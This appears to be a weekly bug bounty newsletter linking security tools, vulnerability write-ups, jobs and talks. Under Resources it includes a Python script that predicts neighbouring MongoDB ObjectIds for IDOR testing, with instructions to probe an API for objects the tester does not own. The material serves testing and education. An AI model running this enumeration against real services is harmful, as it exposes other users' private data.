Hive Five 44 - Hyper scheduling
Hi friends,
Greetings from the hive!
I hope you had a fruitful week and a relaxing weekend. While listening to one of my weekly podcasts, I heard about time blocking or hyper scheduling.
Having seen it mentioned before, I've decided to implement it. Coincidentally, I received an invite to the next-gen calendar called cron. So it seems that the universe is with me on this one.
What new things are you trying out?
Let's take this week by swarm!
The Bee's Knees
We Know Which Private Keys Are Bad: Asymmetric private keys are among the most commonly leaked secrets, but a leaked key only matters if it is actually in use somewhere. Driftwood, a new open source tool, tells you immediately whether a private key is sensitive by checking whether its public half is in use, for example in a TLS certificate or as a GitHub/GitLab SSH key. Read the full blog post.
Advice for young hackers. Getting started in cybersecurity: In this video, they talk about their journey in cybersecurity, how they learned their skills, and what newcomers can do to get started.
honoki/bugbounty-openvpn-socks: This project uses Docker to run multiple VPN tunnels simultaneously from the same machine, and exposes a SOCKS proxy for each separate VPN connection. If you are using tools without built-in proxy support, you can use proxychains to force everything through the proxy regardless.
ChaosDB Explained - Azure's Cosmos DB Vulnerability Walkthrough: This is the full story of the Azure ChaosDB Vulnerability that was discovered and disclosed by the Wiz Research Team, where they were able to gain complete unrestricted access to the databases of several thousand Microsoft Azure customers.
Secondary Contexts by 0xAwali: A collection of over 100 different examples of secondary context related vulnerabilities in web applications.
Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.
Buzzworthy
Changelog
New Release - FullHunt Public API: FullHunt is releasing a public API to find all attack surfaces, exposed services, DNS records, subdomains, and public assets for free.
Three new PentesterLab videos: Covering the code review of PHP snippet #01, #02 and #03.
Corben Leo rewrote gau: This includes speed improvements, a new provider (urlscan), loading options from configuration files, new filter support, socks5 proxy support, and more.
Events
spaceraccoon is co-organizing a Bug Bounty Quarter: @kickino will speak about "Report Medley - What Makes a Bug Report Great?".
Celebrate
Josh got a $10k bounty from Microsoft: Let's go!
It was STÖK's birthday: Happy birthday!
Luke celebrates Katie: Awesome!
Ankit received another bounty: Keep it up!
Mustafa found an interesting SQLi: Amazing!
Career Corner
ca$s:e cage is hiring (remote): Third Party Risk Analyst, Assurance Analyst, Compliance Analyst, Program Manager Policies & Procedures, and Program Manager Security Awareness.
Bishop Fox is hiring (remote US): Just opened up 2 positions on our Cosmos team: Sr Attack Surface Intelligence (ASI) Analyst and Sr Adversarial Operator.
Sera sharing her journey: From high school dropout to senior seceng.
Rachel Tobac sharing her journey: My job path to get to this was so non-linear it's interesting to look back - neuroscience and behavior research to rat lab to teaching to UX research to hacking.
Articles
Practical Security Recommendations for Start-ups with Limited Budgets.
Exploiting CSP in Webkit to Break Authentication & Authorization: When it comes to the web, browsers are the first line of defense.
IDOR through MongoDB Object IDs Prediction: This post assumes that you have a fair understanding of what an IDOR is.
Simple SSRF Allows Access To Internal Assets: While taking a look at one of the host targets at Synack, everything seemed to be a dead end, as only two hosts were in scope and one of them was hosting a web server.
Resources
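The IDOR item above relies on a property of MongoDB ObjectIds that is worth seeing in code: a 12-byte ObjectId is a 4-byte big-endian Unix timestamp, a 5-byte value that is fixed for the lifetime of the generating process (older drivers used a 3-byte machine id plus a 2-byte PID for this field), and a 3-byte big-endian counter that starts at a random value and increments once per generated ID. Documents created by the same server process shortly after a known one therefore differ only in the counter and, at most, a few seconds of timestamp. The following is an added example, not code from the linked post: it splits an ObjectId into its fields, checks whether two IDs came from the same process, and enumerates the neighbouring IDs a tester would try. The sample IDs are constructed for illustration. The fix on the application side is a server-side authorization check on every object access, not a less guessable identifier.

```python
"""Decompose MongoDB ObjectIds and enumerate predictable neighbours (IDOR test).

Added example; the sample IDs below are constructed, not taken from any real system.
"""
from datetime import datetime, timezone

OID_HEX_LEN = 24
COUNTER_MOD = 1 << 24  # the 3-byte counter wraps at 2**24


def parse_object_id(oid_hex: str) -> dict:
    """Split a 24-char hex ObjectId into timestamp, per-process random field and counter."""
    if len(oid_hex) != OID_HEX_LEN:
        raise ValueError(f"ObjectId must be {OID_HEX_LEN} hex chars, got {len(oid_hex)}")
    raw = bytes.fromhex(oid_hex)  # raises ValueError on non-hex input
    timestamp = int.from_bytes(raw[0:4], "big")
    return {
        "timestamp": timestamp,
        "created": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "random": raw[4:9].hex(),
        "counter": int.from_bytes(raw[9:12], "big"),
    }


def build_object_id(timestamp: int, random_hex: str, counter: int) -> str:
    """Reassemble the three fields into a 24-char hex ObjectId (counter wraps at 2**24)."""
    if len(random_hex) != 10:
        raise ValueError("random field must be 5 bytes (10 hex chars)")
    raw = (
        (timestamp & 0xFFFFFFFF).to_bytes(4, "big")
        + bytes.fromhex(random_hex)
        + (counter % COUNTER_MOD).to_bytes(3, "big")
    )
    return raw.hex()


def same_process(a_hex: str, b_hex: str) -> bool:
    """True if both IDs share the 5-byte random field, i.e. were minted by the same
    server process; only then are their counters related and neighbours predictable."""
    return parse_object_id(a_hex)["random"] == parse_object_id(b_hex)["random"]


def predict_neighbours(known_hex: str, counter_span: int = 3, seconds_span: int = 0) -> list:
    """Candidate ObjectIds minted by the same process around `known_hex`.

    counter_span: how many counter steps before and after the known ID to try.
    seconds_span: how many later timestamps (seconds) to try; 0 = same second only.
    The known ID itself is excluded; candidates are in ascending counter order
    within each timestamp.
    """
    p = parse_object_id(known_hex)
    candidates = []
    for dt in range(0, seconds_span + 1):
        for dc in range(-counter_span, counter_span + 1):
            if dt == 0 and dc == 0:
                continue
            candidates.append(build_object_id(p["timestamp"] + dt, p["random"], p["counter"] + dc))
    return candidates


if __name__ == "__main__":
    # Constructed ID: timestamp 0x5f1a2b3c, random 0102030405, counter 0x000010.
    leaked = "5f1a2b3c0102030405000010"
    print(parse_object_id(leaked))
    for candidate in predict_neighbours(leaked, counter_span=2, seconds_span=1):
        print(candidate)  # each of these is a URL path parameter to try against the API
```

In a real test you would feed the candidates to the endpoint that takes the ObjectId and look for 200 responses on objects you do not own; a single hit is the IDOR. If the candidate IDs do not share the random field with a second known ID from the target, the objects were minted by different processes (for example behind a load balancer) and the counter relationship does not hold.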
hakluke on Burp usage (replies): Find out where people spent the majority of their time in Burp.
All about bug bounty: These are bug bounty notes that they have gathered from various sources; you can contribute to this repository too.
Useful sed scripts: This was born in 4-5 hours of recapping sed (and many hours learning it in the first place).
Sysmon Cheatsheet: All sysmon event types and their fields explained.
Awesome Web Archiving: An Awesome List for getting started with web archiving.
Videos
Isabelle Mauny API security talk with We Hack Purple: Isabelle Mauny of 42Crunch fame talks about API security as well as demonstrates APIsecurity.io with Tanya Janca and We hack Purple.
Staying sane in bug bounties: zseano's talk for Ekoparty Security Conference.
BountyTraining - Getting a feel for your target with BugBountyHunter: What does it mean to actually "get a feel for things"?
I quit my IT job for YouTube and bounty - bounty vlog #0: Series on their bounty journey with all the details, like time spent and money earned.
Audio
STÖK tells us to listen to TOOL: I wholeheartedly agree. While you're at it, check out this video of their drummer Danny Carey.
The Next Generation of Hackers with Deviant Ollam: In episode three of Hacker Valley Red, Chris and Ron are joined by Deviant Ollam, a hacker to the bone and one of Chris' inspirations in security.
Focused - Hyper-Scheduling Revisited: Mike and David return to the subject of hyper-scheduling after they've both been at it a few years.